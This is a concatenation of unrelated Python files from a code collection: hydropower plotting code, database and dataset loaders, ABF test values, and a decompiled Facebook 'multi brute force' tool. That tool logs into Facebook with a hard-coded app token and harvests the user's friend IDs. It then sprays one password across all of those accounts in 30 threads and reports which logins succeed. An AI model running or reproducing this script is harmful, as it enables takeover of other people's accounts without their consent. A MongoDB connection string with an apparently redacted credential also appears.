plt.plot(np.array(range(len(simulation_years))), np.sum(ELCC_BAL_yearly[:,plot_HPP_multiple], axis = 1)/10**3, label = 'ELCC$_{tot}$', color = 'black', linestyle = '--', linewidth = 3)
plt.legend(loc = 'center left', bbox_to_anchor = (1, 0.5))
plt.xticks(np.array(range(len(simulation_years))), np.array(range(len(simulation_years))) + 1)
plt.xlabel('year')
plt.ylabel('Power generation (GWh/year)')
plt.ylim([0, np.nanmax(np.sum(E_generated_BAL_bymonth_sum, axis = 0))*1.1])
plt.title('Multiannual generation (BAL)')
plt.savefig("Total_Fig2.png", dpi = 300, bbox_inches = 'tight')
# [figure] (cf. Fig. 2 main paper, Fig. S5)
# [plot] power mix for selected days of selected month
fig = plt.figure()
area_mix_full = [np.nansum(P_BAL_hydro_stable_hourly[hrs_year,plot_year_multiple,plot_HPP_multiple[:,np.newaxis]], axis = 0), np.nansum(P_BAL_hydro_flexible_hourly[hrs_year,plot_year_multiple,plot_HPP_multiple[:,np.newaxis]], axis = 0), np.nansum(P_BAL_wind_hourly[hrs_year,plot_year_multiple,plot_HPP_multiple[:,np.newaxis]], axis = 0), np.nansum(P_BAL_solar_hourly[hrs_year,plot_year_multiple,plot_HPP_multiple[:,np.newaxis]], axis = 0), np.nansum(P_BAL_hydro_RoR_hourly[hrs_year,plot_year_multiple,plot_HPP_multiple[:,np.newaxis]], axis = 0), P_BAL_thermal_hourly[hrs_year,plot_year_multiple], -1*P_BAL_curtailed_hourly[hrs_year,plot_year_multiple]]
plt.stackplot(np.array(hrs_year), area_mix_full, labels = labels_generation_BAL, colors = [colour_hydro_stable, colour_hydro_flexible, colour_wind, colour_solar, colour_hydro_RoR, colour_thermal, colour_curtailed])
plt.plot(np.array(hrs_year), P_total_hourly[hrs_year,plot_year_multiple], label = 'Total load', color = 'black', linewidth = 3)
plt.plot(np.array(hrs_year), np.nansum(L_followed_BAL_hourly[hrs_year,plot_year_multiple,plot_HPP_multiple[:,np.newaxis]], axis = 0), label = 'ELCC$_{tot}$', color = 'black', linestyle = '--', linewidth = 3)
plt.legend(loc = 'center left', bbox_to_anchor = (1, 0.5))
plt.xticks(np.array(np.arange(hrs_year[0],hrs_year[-1] + hrs_day,hrs_day)), days_bymonth_byyear_axis)
plt.xlim([hrs_day*plot_day_load, hrs_day*(plot_day_load + plot_num_days_multiple)])
plt.ylim([0, np.nanmax(np.sum(area_mix_full, axis = 0)*1.1)])
plt.xlabel('Day of the year')
plt.ylabel('Power generation (MWh/h)')
plt.title('Daily generation & load profiles (BAL)')
plt.savefig("Total_Fig3.png", dpi = 300, bbox_inches = 'tight')
# [check] if STOR scenario available
if option_storage == 1 and np.min(STOR_break[plot_HPP_multiple]) == 0:
# [figure] (cf. Fig. S4a, S9a)
# [plot] average monthly power mix in user-selected year
fig = plt.figure()
area_mix_STOR_bymonth = [np.nansum(E_hydro_STOR_stable_bymonth[:,plot_year_multiple,plot_HPP_multiple], axis = 1), np.nansum(E_hydro_STOR_flexible_bymonth[:,plot_year_multiple,plot_HPP_multiple], axis = 1), np.nansum(E_wind_STOR_bymonth[:,plot_year_multiple,plot_HPP_multiple] - E_hydro_pump_STOR_bymonth[:,plot_year_multiple,plot_HPP_multiple], axis = 1) - E_curtailed_STOR_bymonth[:,plot_year_multiple], np.nansum(E_solar_STOR_bymonth[:,plot_year_multiple,plot_HPP_multiple], axis = 1), np.nansum(E_hydro_BAL_RoR_bymonth[:,plot_year_multiple,plot_HPP_multiple], axis = 1), E_thermal_STOR_bymonth[:,plot_year_multiple], E_curtailed_STOR_bymonth[:,plot_year_multiple]]/days_year[:,plot_year_multiple]*10**3/hrs_day
labels_generation_STOR = ['Hydropower (stable)', 'Hydropower (flexible)', 'Wind power', 'Solar power', 'Hydropower (RoR)', 'Thermal', 'Curtailed VRE']
plt.stackplot(np.array(range(months_yr)), area_mix_STOR_bymonth, labels = labels_generation_STOR, colors = [colour_hydro_stable, colour_hydro_flexible, colour_wind, colour_solar, colour_hydro_RoR, colour_thermal, colour_curtailed])
plt.fill_between(np.array(range(months_yr)), -1*np.nansum(E_hydro_pump_STOR_bymonth[:,plot_year_multiple,plot_HPP_multiple], axis = 1), label = 'Stored VRE', facecolor = colour_hydro_pumped)
plt.plot(np.array(range(months_yr)), E_total_bymonth[:,plot_year_multiple]/days_year[:,plot_year_multiple]*10**3/hrs_day, label = 'Total load', color = 'black', linewidth = 3)
plt.plot(np.array(range(months_yr)), np.nansum(ELCC_STOR_bymonth[:,plot_year_multiple,plot_HPP_multiple], axis = 1), label = 'ELCC$_{tot}$', color = 'black', linestyle = '--', linewidth = 3)
plt.plot(np.array(range(months_yr)), np.zeros(months_yr), color = 'black', linewidth = 1)
plt.legend(loc = 'center left', bbox_to_anchor = (1, 0.5))
plt.xticks(np.array(range(months_yr)),months_names_full, rotation = 'vertical')
plt.ylabel('Power generation (MWh/h)')
plt.title('monthly power generation (selected year #' + str(plot_year_multiple + 1) + ', STOR)')
plt.savefig("Total_Fig1_b.png", dpi = 300, bbox_inches = 'tight')
# [figure] (cf. Fig. S4b, S9b)
# [plot] power mix by year
fig = plt.figure()
E_generated_STOR_bymonth_sum = [np.nansum(np.sum(E_hydro_STOR_stable_bymonth[:,:,plot_HPP_multiple], axis = 0), axis = 1), np.nansum(np.sum(E_hydro_STOR_flexible_bymonth[:,:,plot_HPP_multiple], axis = 0), axis = 1), np.nansum(np.sum(E_wind_STOR_bymonth[:,:,plot_HPP_multiple] - E_hydro_pump_STOR_bymonth[:,:,plot_HPP_multiple], axis = 0), axis = 1) - np.sum(E_curtailed_STOR_bymonth, axis = 0), np.nansum(np.sum(E_solar_STOR_bymonth[:,:,plot_HPP_multiple], axis = 0), axis = 1), np.nansum(np.sum(E_hydro_BAL_RoR_bymonth[:,:,plot_HPP_multiple], axis = 0), axis = 1), np.sum(E_thermal_STOR_bymonth, axis = 0), np.sum(E_curtailed_STOR_bymonth, axis = 0)]
plt.bar(np.array(range(len(simulation_years))), E_generated_STOR_bymonth_sum[0], bottom = np.sum(E_generated_STOR_bymonth_sum[0:0], axis = 0), label = 'Hydropower (stable)', color = colour_hydro_stable)
plt.bar(np.array(range(len(simulation_years))), E_generated_STOR_bymonth_sum[1], bottom = np.sum(E_generated_STOR_bymonth_sum[0:1], axis = 0), label = 'Hydropower (flexible)', color = colour_hydro_flexible)
plt.bar(np.array(range(len(simulation_years))), E_generated_STOR_bymonth_sum[2], bottom = np.sum(E_generated_STOR_bymonth_sum[0:2], axis = 0), label = 'Wind power', color = colour_wind)
plt.bar(np.array(range(len(simulation_years))), E_generated_STOR_bymonth_sum[3], bottom = np.sum(E_generated_STOR_bymonth_sum[0:3], axis = 0), label = 'Solar power', color = colour_solar)
plt.bar(np.array(range(len(simulation_years))), E_generated_STOR_bymonth_sum[4], bottom = np.sum(E_generated_STOR_bymonth_sum[0:4], axis = 0), label = 'Hydropower (RoR)', color = colour_hydro_RoR)
plt.bar(np.array(range(len(simulation_years))), E_generated_STOR_bymonth_sum[5], bottom = np.sum(E_generated_STOR_bymonth_sum[0:5], axis = 0), label = 'Thermal', color = colour_thermal)
plt.bar(np.array(range(len(simulation_years))), E_generated_STOR_bymonth_sum[6], bottom = np.sum(E_generated_STOR_bymonth_sum[0:6], axis = 0), label = 'Curtailed VRE', color = colour_curtailed)
plt.bar(np.array(range(len(simulation_years))), -1*np.nansum(np.sum(E_hydro_pump_STOR_bymonth[:,:,plot_HPP_multiple], axis = 0), axis = 1), label = 'Stored VRE', color = colour_hydro_pumped)
plt.plot(np.array(range(len(simulation_years))), np.sum(E_total_bymonth, axis = 0), label = 'Total load', color = 'black', linewidth = 3)
plt.plot(np.array(range(len(simulation_years))), np.sum(ELCC_STOR_yearly[:,plot_HPP_multiple], axis = 1)/10**3, label = 'ELCC$_{tot}$', color = 'black', linestyle = '--', linewidth = 3)
plt.plot(np.array(range(len(simulation_years))), np.zeros(len(simulation_years)), color = 'black', linewidth = 1)
plt.legend(loc = 'center left', bbox_to_anchor = (1, 0.5))
plt.xticks(np.array(range(len(simulation_years))), np.array(range(len(simulation_years))) + 1)
plt.xlabel('year')
plt.ylabel('Power generation (GWh/year)')
plt.ylim([np.nanmin(-1*np.sum(E_hydro_pump_STOR_bymonth[:,:,plot_HPP_multiple], axis = 0))*1.1, np.nanmax(np.sum(E_generated_STOR_bymonth_sum, axis = 0))*1.1])
plt.title('Multiannual generation (STOR)')
plt.savefig("Total_Fig2_b.png", dpi = 300, bbox_inches = 'tight')
# [figure] (cf. Fig. 2 main paper, Fig. S5)
# [plot] power mix for selected days of selected month
fig = plt.figure()
area_mix_full = [np.nansum(P_STOR_hydro_stable_hourly[hrs_year,plot_year_multiple,plot_HPP_multiple[:,np.newaxis]], axis = 0), np.nansum(P_STOR_hydro_flexible_hourly[hrs_year,plot_year_multiple,plot_HPP_multiple[:,np.newaxis]], axis = 0), np.nansum(P_STOR_wind_hourly[hrs_year,plot_year_multiple,plot_HPP_multiple[:,np.newaxis]] - P_STOR_pump_hourly[hrs_year,plot_year_multiple,plot_HPP_multiple[:,np.newaxis]], axis = 0), np.nansum(P_STOR_solar_hourly[hrs_year,plot_year_multiple,plot_HPP_multiple[:,np.newaxis]], axis = 0), np.nansum(P_BAL_hydro_RoR_hourly[hrs_year,plot_year_multiple,plot_HPP_multiple[:,np.newaxis]], axis = 0), P_STOR_thermal_hourly[hrs_year,plot_year_multiple], -1*P_STOR_curtailed_hourly[hrs_year,plot_year_multiple]]
plt.stackplot(np.array(hrs_year), area_mix_full, labels = labels_generation_STOR, colors = [colour_hydro_stable, colour_hydro_flexible, colour_wind, colour_solar, colour_hydro_RoR, colour_thermal, colour_curtailed])
plt.fill_between(np.array(hrs_year), -1*np.nansum(P_STOR_pump_hourly[hrs_year,plot_year_multiple,plot_HPP_multiple[:,np.newaxis]], axis = 0), label = 'Stored VRE', color = colour_hydro_pumped)
plt.plot(np.array(hrs_year), P_total_hourly[hrs_year,plot_year_multiple], label = 'Total load', color = 'black', linewidth = 3)
plt.plot(np.array(hrs_year), np.nansum(L_followed_STOR_hourly[hrs_year,plot_year_multiple,plot_HPP_multiple[:,np.newaxis]], axis = 0), label = 'ELCC$_{tot}$', color = 'black', linestyle = '--', linewidth = 3)
plt.plot(np.array(hrs_year), np.zeros(len(hrs_year)), color = 'black', linewidth = 1)
plt.legend(loc = 'center left', bbox_to_anchor = (1, 0.5))
plt.xticks(np.array(np.arange(hrs_year[0],hrs_year[-1] + hrs_day,hrs_day)), days_bymonth_byyear_axis)
plt.xlim([hrs_day*plot_day_load, hrs_day*(plot_day_load + plot_num_days_multiple)])
plt.ylim([np.nanmin(-1*np.nansum(P_STOR_pump_hourly[hrs_year,plot_year_multiple,plot_HPP_multiple[:,np.newaxis]], axis = 0))*1.1, np.nanmax(np.sum(area_mix_full, axis = 0)*1.1)])
plt.xlabel('Day of the year')
plt.ylabel('Power generation (MWh/h)')
plt.title('Daily generation & load profiles (STOR)')
plt.savefig("Total_Fig3_b.png", dpi = 300, bbox_inches = 'tight')
|
StarcoderdataPython
|
1745844
|
<reponame>Anderson-VargasQ/mecatronicaUNT_Prog2_Digitalizaci-n_del_Sistema_de_Ventas.-
#pip install pymongo --user
#pip install dnspython --user
import pymongo
from editar_excel import list1
import random
client = pymongo.MongoClient("mongodb+srv://grupo_hailpy:<EMAIL>/Proyecto?retryWrites=true&w=majority")
db = client.test
try:
print("MongoDB version is %s" %
client.server_info()['version'])
except pymongo.errors.OperationFailure as error:
print(error)
quit(1)
my_database = client.test
my_collection = my_database.bases
#PARA INSERTAR UN SOLO DATO
for i in range(50):
a=random.randrange(40,60,1)
my_collection.insert_one({
"_id": list1[i][2],
"categoria": list1[i][0],
"name": list1[i][1],
"precio_costo": list1[i][3],
"precio_venta": list1[i][4],
"utilidad": list1[i][5],
"stock": a,
"reserva": 0,
"stock_disp": a,
})
"""
#PARA INSERTAR VARIOS DATOS
my_collection.insert_many([
{
"_id": 69,
"name": "andergei",
"calories": 295, "protein": 17,
"fats": { "saturated": 5.0, "trans": 0.8 },
},
{
"_id": 44,
"name": "alfredputo",
"calories": 226, "protein": 9,
"fats": { "saturated": 4.4, "trans": 0.5 },
}
])
#Buscando un dato
my_cursor = my_collection.find()
for item in my_cursor:
print(item["name"])
#Devuelve sólo aquellos documentos que cumplen criterios específicos
my_cursor = my_collection.find({
"name": "pizza"
})
#Para cambiar parametros dentro de un dato
my_collection.update_one(
{ "name": "taco" }, # query
{
"$set": { # new data
"fiber": 3.95,
"sugar": 0.9
}
}
)
"""
|
StarcoderdataPython
|
3285100
|
<filename>src/workers.py
import os
from time import time
from src.db import DB
from src.replay import Replay
from src.evaluation import Match
class File(object):
def __init__(self, file_name):
self.name = file_name
self.processed = False
self.last_processed = None
def mark_processed(self):
self.processed = True
self.last_processed = time()
class ReplayFile(File):
def __init__(self, file_name):
super().__init__(file_name=file_name)
# Extract information from file name
strp_file_name = file_name.split('-')
strp_match_info = strp_file_name[3].split(' ')
strp_team_info = strp_file_name[4].split(' ')
# get match & map info
self.match_id = int(strp_match_info[2])
self.round_id = int(strp_match_info[-2])
# get team info
team_1 = strp_team_info[1]
team_2 = strp_team_info[-2]
self.teams = [team_1, team_2]
class DirectoryWatchDog(object):
def __init__(self, working_dir, config_dir):
self._working_dir = working_dir
self._last_state_file = os.path.join(config_dir, 'files.csv')
self.dir_content = {}
self.update()
def update(self):
current_state = os.listdir(self._working_dir)
previous_state = list(self.dir_content.keys())
added_files = [
file_name for file_name in current_state
if file_name not in previous_state
]
removed_files = [
file_name for file_name in previous_state
if file_name not in current_state
]
if len(added_files) > 0:
self.add_files(file_names=added_files)
if len(removed_files) > 0:
self.remove_files(file_names=removed_files)
def add_file(self, file_name):
self.dir_content[file_name] = File(file_name=file_name)
def add_files(self, file_names):
for file_name in file_names:
self.add_file(file_name=file_name)
def remove_file(self, file_name):
del self.dir_content[file_name]
def remove_files(self, file_names):
for file_name in file_names:
self.remove_file(file_name=file_name)
def mark_processed(self, file_name):
self.dir_content[file_name].mark_processed()
class ReplayDirectoryWatchDog(DirectoryWatchDog):
def add_file(self, file_name):
self.dir_content[file_name] = ReplayFile(file_name=file_name)
class DataBaseUpdater(object):
def __init__(self, watch_dog, db_path, db_framework='sqlite'):
self._db = DB(path=db_path, framework=db_framework)
self._watchdog = watch_dog
if not os.path.exists(db_path):
self._db.create_db()
def update(self):
for file_name in self._watchdog.dir_content:
pass
|
StarcoderdataPython
|
3206620
|
# -*- coding:utf-8 -*-
# @Time: 2020/1/14 9:13
# @Author: jockwang, <EMAIL>
from torch.utils.data import Dataset
import torch
import logging
import pandas as pd
from sklearn.model_selection import train_test_split
import numpy as np
class MyDataset(Dataset):
def __init__(self, mode='train', item_size=0, dataset='book'):
super(MyDataset, self).__init__()
df = pd.read_csv('/content/drive/My Drive/Colab Notebooks/Graph4CTR/data/' + dataset + '/ratings_final.txt',
sep='\t', header=None, index_col=None).values
train, test = train_test_split(df, test_size=0.2, random_state=2019)
self.item_size = item_size
if mode == 'train':
self.data = train
else:
self.data = test
logging.info(mode + ' set size:' + str(self.data.shape[0]))
def __getitem__(self, index):
temp = self.data[index]
item = np.zeros(shape=(1, self.item_size))
item[0, temp[1]] = 1
return torch.tensor(temp[0], dtype=torch.long), torch.tensor(item, dtype=torch.float), torch.tensor(
[temp[2]], dtype=torch.float)
def __len__(self):
return len(self.data)
|
StarcoderdataPython
|
3359595
|
"""
Check the first value of every ABF to ensure it matches what we expect.
"""
import sys
import pytest
import datetime
import inspect
import numpy as np
import glob
try:
# this ensures pyABF is imported from this specific path
sys.path.insert(0, "src")
import pyabf
except:
raise ImportError("couldn't import local pyABF")
FIRSTVALUES = {}
FIRSTVALUES['05210017_vc_abf1'] = ['-136.29149', '11625.36621']
FIRSTVALUES['14o08011_ic_pair'] = ['-65.52124', '-56.12183']
FIRSTVALUES['14o16001_vc_pair_step'] = ['-25.87890', '-31.49414']
FIRSTVALUES['16d05007_vc_tags'] = ['0.85449']
FIRSTVALUES['16d22006_kim_gapfree'] = ['0.01007', '0.13641']
FIRSTVALUES['171116sh_0011'] = ['-125.73241']
FIRSTVALUES['171116sh_0012'] = ['-120.23925']
FIRSTVALUES['171116sh_0013'] = ['-103.51562']
FIRSTVALUES['171116sh_0014'] = ['-109.98534']
FIRSTVALUES['171116sh_0015'] = ['-119.38476']
FIRSTVALUES['171116sh_0016'] = ['-61.43188']
FIRSTVALUES['171116sh_0017'] = ['-61.70654']
FIRSTVALUES['171116sh_0018'] = ['-62.46948']
FIRSTVALUES['171116sh_0019'] = ['-62.43896']
FIRSTVALUES['171116sh_0020'] = ['72.75390']
FIRSTVALUES['171117_HFMixFRET'] = [
'-0.43945', '-94.87915', '0.06989', '0.07080']
FIRSTVALUES['17o05024_vc_steps'] = ['-21.36230']
FIRSTVALUES['17o05026_vc_stim'] = ['-16.11328']
FIRSTVALUES['17o05027_ic_ramp'] = ['-48.00415']
FIRSTVALUES['17o05028_ic_steps'] = ['-47.08862']
FIRSTVALUES['180415_aaron_temp'] = ['-0.35187', '25.02339']
FIRSTVALUES['2018_04_13_0016a_original'] = ['-115.96679', '-15.25879']
FIRSTVALUES['2018_04_13_0016b_modified'] = ['-115.96679', '-7.44399']
FIRSTVALUES['model_vc_ramp'] = ['-138.42772']
FIRSTVALUES['model_vc_step'] = ['-140.13670']
FIRSTVALUES['18702001-biphasicTrain'] = ['-10.74219', '-1.03607']
FIRSTVALUES['18702001-cosTrain'] = ['-8.05664', '-1.03638']
FIRSTVALUES['18702001-pulseTrain'] = ['-11.71875', '-1.03607']
FIRSTVALUES['18702001-ramp'] = ['-12.20703', '-1.03638']
FIRSTVALUES['18702001-step'] = ['-10.49805', '-1.03546']
FIRSTVALUES['18702001-triangleTrain'] = ['-9.88769', '-1.03577']
FIRSTVALUES['130618-1-12'] = ['-188.33015']
FIRSTVALUES['18711001'] = ['-66.66565']
FIRSTVALUES['18713001'] = ['-64.27002']
FIRSTVALUES['sine sweep magnitude 20'] = ['0.00000']
FIRSTVALUES['171116sh_0015-ATFwaveform'] = ['-119.38476']
FIRSTVALUES['2018_08_23_0009'] = ['-138.42772']
FIRSTVALUES['18807005'] = ['506.59180']
FIRSTVALUES['18808025'] = ['-14.77051']
FIRSTVALUES['File_axon_2'] = ['-55.28870']
FIRSTVALUES['File_axon_3'] = ['-15.50000', '-22000.00000']
# ABFFIO.DLL TELLS ME File_axon_3 SHOULD BE: ['-0.15500', '-55.00000']
FIRSTVALUES['File_axon_4'] = ['-0.00610']
FIRSTVALUES['File_axon_5'] = ['-71.05103']
FIRSTVALUES['File_axon_6'] = ['-56.47583', '-0.03357']
FIRSTVALUES['File_axon_7'] = ['-1.48067']
FIRSTVALUES['File_axon_1'] = ['2.18811']
FIRSTVALUES['abf1_with_tags'] = ['-34.54589']
FIRSTVALUES['2018_11_16_sh_0006'] = ['-119.14062']
FIRSTVALUES['sample trace_0054'] = ['0.00931']
FIRSTVALUES['f1'] = ['-30.51758', '-4.27246', '3100.58594', '3445.43457']
FIRSTVALUES['171116sh_0020_saved'] = ['72.72339']
FIRSTVALUES['f1_saved'] = ['-30.51758']
FIRSTVALUES['2018_12_09_pCLAMP11_0001'] = ['-3.65051']
FIRSTVALUES['18425108'] = ['0.07935', '-71.35010']
FIRSTVALUES['2018_05_08_0028-IC-VC-pair'] = ['-68.57300', '-153.32030']
FIRSTVALUES['18425108_abf1'] = ['0.07935', '-71.31958']
FIRSTVALUES['pclamp11_4ch'] = ['-0.24017', '-0.08545', '-0.00793', '0.27313']
FIRSTVALUES['pclamp11_4ch_abf1'] = [
'-0.23987', '-0.08514', '-0.00763', '0.27313']
FIRSTVALUES['2018_12_15_0000'] = ['-0.16541', '0.26764', '0.04761', '-0.28351']
FIRSTVALUES['vc_drug_memtest'] = ['-7.20215']
FIRSTVALUES['190619B_0003'] = ['-65.91796', '-18.92090']
FIRSTVALUES['19212027'] = ['-197.14355', '-70.55664']
FIRSTVALUES['multichannelAbf1WithTags'] = ['0.85449', '-49.98370']
FIRSTVALUES['H19_29_150_11_21_01_0011'] = ['-67.95654', '-0.48828']
FIRSTVALUES['DM1_0000'] = ['-0.91553', '-1.35803']
FIRSTVALUES['DM1_0001'] = ['-2.13623', '-1.19019']
FIRSTVALUES['DM1_0002'] = ['-3.66211', '-1.28174']
FIRSTVALUES['DM1_0003'] = ['-1.52588', '-1.35803']
FIRSTVALUES['2019_05_02_DIC2_0011'] = ['-67.71851', '16.17432']
FIRSTVALUES['2019_07_24_0055_fsi'] = ['-53.92456']
FIRSTVALUES['opto_aps_bad_units'] = ['-1586.91406']
FIRSTVALUES['opto_aps_good_units'] = ['-75.98877']
FIRSTVALUES['19122043'] = ['-0.00031', '0.00031', '-173.88916', '4.88281']
FIRSTVALUES['ch121219_1_0001'] = ['-42.75513', '36.62109']
FIRSTVALUES['invalidDate-abf1'] = ['-138.39722']
FIRSTVALUES['invalidDate-abf2'] = ['-138.42772']
@pytest.mark.parametrize("abfPath", glob.glob("data/abfs/*.abf"))
def test_valuesMatch_firstValue(abfPath):
abf = pyabf.ABF(abfPath)
firstValues = []
for channel in abf.channelList:
abf.setSweep(0, channel)
firstValues.append("%.05f" % (abf.sweepY[0]))
if not abf.abfID in FIRSTVALUES.keys():
raise NotImplementedError(
"MISSING VALUES FOR %s: %s" % (abf.abfID, firstValues))
elif firstValues != FIRSTVALUES[abf.abfID]:
print("\n\nERROR WITH", abf.abfID)
print(" expected:", FIRSTVALUES[abf.abfID])
print(" actual:", firstValues)
raise ValueError(
"VALUE ERROR FOR: %s\nEXPECTED: %s\nGOT: %s" %
(abf.abfID, FIRSTVALUES[abf.abfID], firstValues))
|
StarcoderdataPython
|
192618
|
<reponame>shyamjangid07/Reverse-Engineering
# Decompiled by HTR-TECH | <NAME>
# Github : https://github.com/htr-tech
#---------------------------------------
# Source File : pro.py
# Time : Sun Feb 14 08:34:41 2021
#---------------------------------------
# uncompyle6 version 3.7.4
# Python bytecode 2.7
# Decompiled from: Python 2.7.16 (default, Oct 10 2019, 22:02:15)
# [GCC 8.3.0]
# Embedded file name: <hekelpro>
import os, sys, time, json, urllib, threading, requests
d = '\x1b[90;1m'
m = '\x1b[91;1m'
h = '\x1b[92;1m'
k = '\x1b[93;1m'
b = '\x1b[94;1m'
p = '\x1b[95;1m'
a = '\x1b[96;1m'
pu = '\x1b[97;1m'
count = 0
dados1 = []
gagal = []
oradadi = []
threads = []
id_konco = []
def ival(nob):
color = {'d': 90, 'm': 91, 'h': 92, 'k': 93, 'b': 94, 'p': 95, 'a': 96, 'w': 97}
for iv in color:
nob = nob.replace('\r%s' % iv, '\x1b[%s;1m' % color[iv])
nob += '\x1b[0m'
nob = nob.replace('\r0', '\x1b[0m')
print nob
def run(noob):
for i in noob + '\n':
sys.stdout.write(i)
sys.stdout.flush()
time.sleep(10.0 / 1000)
def clear():
os.system('clear')
def banner():
clear()
ival('\ra\n \n _____ __. _____ \n / \\_ |___/ ____/ \rw\n / \\ / \\| __ \\ __\\ \ra \n / Y \\ \\_\\ \\ | \n \\____|__ /___ /__| \n \\/ \\/ \n \rw+==============================+\n \ra| MULTI BRUTE FORCE |\n \rw+==============================+ \n \rd==========================\n \rp[ \rwCreated by \raIqbal Dev\rp ]\n \rp[ \rwThanks to \raIvana Raa/\rp ]\n \rd==========================')
def logout():
try:
print k + ' [' + pu + '1' + k + ']' + a + ' Keluar Dari Program..'
print k + ' [' + pu + '2' + k + ']' + a + ' Keluar Dari Akun Facebook..'
iqbal = raw_input(p + ' [?]' + h + ' Pilih Salah Satu.. ' + a + '[' + pu + ' 1 / 2' + a + ' ]\x1b[97m: ')
if iqbal == '1':
print d + ' Keluar Dari Program..'
elif iqbal == '2':
print k + ' Keluar Dari Akun Fb...'
print h + ' Anda Harus Login Fb Lagi..'
os.system('rm -f token.txt')
else:
print m + 'Pilih yg Bener Cuk..'
logout()
except KeyboardInterrupt:
sys.exit()
def login():
try:
token = open('token.txt', 'r')
mbf()
sel()
except IOError as KeyError:
banner()
user_name = raw_input(p + ' [' + h + '+log' + p + ']' + a + ' Username' + pu + ': ')
password = raw_input(p + ' [' + h + '+log' + p + ']' + a + ' Password' + d + ': ')
req = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user_name + '&locale=en_US&password=' + password + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
dev = req.content
jsl = json.loads(dev)
if 'session_key' in dev:
print
run(h + ' Berhasil Login\x1b[97m........')
open('token.txt', 'w').write(jsl['access_token'])
run(h + ' Login Sukses\x1b[97m........')
print
id_teman()
elif 'www.facebook.com' in jsl['error_msg']:
print
print k + ' Akun Kena Cekpoint..'
print
sys.exit()
else:
print
print m + ' Gagal Login...'
print
sys.exit()
except KeyboardInterrupt:
print
print d + ' Keluar Dari Program..'
def id_teman():
try:
token = open('token.txt', 'r').read()
except IOError:
print m + ' Tidak ada token...'
os.system('rm -f token.txt')
else:
try:
req = requests.get('https://graph.facebook.com/me/friends?access_token=' + token)
jsl = json.loads(req.text)
simpan_id = open('id.txt', 'w')
for ival in jsl['data']:
id_konco.append(ival['id'])
simpan_id.write(ival['id'] + '\n')
data_id = open('id.txt', 'r').read().split()
sys.stdout.write('\r \x1b[95m [$]\x1b[92m Mengambil ID Teman \x1b[97m=> ' + str(len(data_id)))
sys.stdout.flush()
simpan_id.close()
print
print a + '\n ID Tersimpan ' + p + '(' + pu + 'id.txt' + p + ')'
print
iqbal = requests.get('https://graph.facebook.com/me?access_token=' + token)
dev = json.loads(iqbal.text)
nama = dev['name']
print h + ' [ ' + p + 'Lanjutkan ' + pu + nama + h + ' ]\n'
raw_input(k + ' => ')
except IOError:
print m + ' Terjadi kesalahan...'
def mbf():
global listID
global nama
global password
try:
token = open('token.txt', 'r')
except IOError:
print
print m + ' Token Tidak Ada'
os.system('rm -f token.txt')
login()
else:
print
banner()
try:
token = open('token.txt', 'r').read()
iqbal_name = requests.get('https://graph.facebook.com/me?access_token=' + token)
dev = json.loads(iqbal_name.text)
nama = dev['name']
print h + ' []' + a + ' Selamat Datang ' + pu + nama + '\x1b[92m :)'
print d + ' ======================================'
password = raw_input(h + ' [' + k + 'MBF' + h + ']' + a + ' Cracking Password' + p + ': ')
if password == '':
print m + ' Jangan Kosong Cuk..'
sys.exit()
if password == ' ':
print m + ' Jangan Kosong Cuk..'
sys.exit()
print
try:
listID = open('id.txt', 'r')
for ival in range(30):
iqbal = threading.Thread(target=iqbaldevmbf, args=())
iqbal.start()
threads.append(iqbal)
for ipal in threads:
ipal.join()
except IOError:
print
print m + ' Tidak Ada File Yang Ditemukan..'
except KeyboardInterrupt:
print
print d + ' Keluar Dari Program'
sys.exit()
except KeyError:
print
print m + ' Terjadi Error Mungkin Akun Kena Cekpoint'
os.system('rm -f token.txt')
print
def iqbaldevmbf():
global baris
global count
global dados1
global gagal
global oradadi
try:
data_lis = open('id.txt', 'r')
baris = data_lis.read().split()
while listID:
user = listID.readline().strip()
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + password + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
Iq_data = urllib.urlopen(url)
jsl = json.load(Iq_data)
if count == len(baris):
break
elif 'access_token' in jsl:
dados1.append(h + ' [OK] ' + pu + user + ' | ' + a + password)
count += 1
elif 'www.facebook.com' in jsl['error_msg']:
gagal.append(m + ' [CP] ' + d + user + ' | ' + m + password)
count += 1
else:
oradadi.append(user)
count += 1
sys.stdout.write(pu + '\r [$]' + a + ' Cracking ' + p + str(len(baris)) + pu + ' / ' + p + str(count) + m + ' [ ' + h + str(len(dados1)) + pu + ' / ' + k + str(len(gagal)) + m + ' ]')
sys.stdout.flush()
except IOError:
print
print m + ' Gangguan koneksi..'
def sel():
print
print
for iqbal in dados1:
print iqbal
for dev in gagal:
print dev
print
print m + ' Bosok => ' + str(len(oradadi))
print
logout()
sys.exit()
def main():
login()
mbf()
sel()
if __name__ == '__main__':
main()
|
StarcoderdataPython
|
3397291
|
<gh_stars>1-10
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from .base import *
from .transformer import TransformerPrimitiveBase
__all__ = (u'FeaturizationPrimitiveBase',
u'FeaturizationTransformerPrimitiveBase')
class FeaturizationPrimitiveBase(PrimitiveBase[(Inputs, Outputs, Params)]):
u'\n A base class for primitives which transform raw data into a more usable form.\n\n Use this version for featurizers that allow for fitting (for domain-adaptation, data-specific deep\n learning, etc.). Otherwise use `FeaturizationTransformerPrimitiveBase`.\n '
class FeaturizationTransformerPrimitiveBase(TransformerPrimitiveBase[(Inputs, Outputs)]):
u'\n A base class for primitives which transform raw data into a more usable form.\n\n Use this version for featurizers that do not require or allow any fitting, and simply\n transform data on demand. Otherwise use `FeaturizationPrimitiveBase`.\n '
|
StarcoderdataPython
|
136586
|
<filename>pycws/pycws/urls.py
"""pycws URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from . import views
urlpatterns = [
path('', views.feed, name='feed'),
